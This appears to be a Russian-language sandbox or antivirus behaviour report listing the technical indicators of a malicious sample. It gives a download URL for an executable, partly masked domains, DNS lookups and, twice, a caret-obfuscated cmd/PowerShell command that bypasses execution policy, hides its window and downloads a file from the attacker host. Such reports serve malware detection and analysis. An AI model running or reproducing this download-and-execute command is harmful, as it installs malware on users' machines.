Техническая информация
- http://nexcontech.com/wp-content/ay4te/mdp5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWErS^He^LL.^eXE^ -E^X^ECU^t^i^On^PolIC^Y BY^pA^ss^ -^N^oP^rOFILe -W^InDO^W^St^YlE^ h^Id^DeN (^nE^W^-^OBj^eC^t ^syst^E^m^.N^ET^.WEBclIe^NT).DO^wn^l^OAD^fiLe(^'http://nexconte...
- %APPDATA%.exe
- 'ne###ntech.com':80
- 'ht##.#odhosting.net':80
- http://ne###ntech.com/wp-content/Ay4TE/mdp5.exe
- http://ht##.#odhosting.net/404.html
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
- '<SYSTEM32>\cmd.exe' /C "poWErS^He^LL.^eXE^ -E^X^ECU^t^i^On^PolIC^Y BY^pA^ss^ -^N^oP^rOFILe -W^InDO^W^St^YlE^ h^Id^DeN (^nE^W^-^OBj^eC^t ^syst^E^m^.N^ET^.WEBclIe^NT).DO^wn^l^OAD^fiLe(^'http://nexconte...' (со скрытым окном)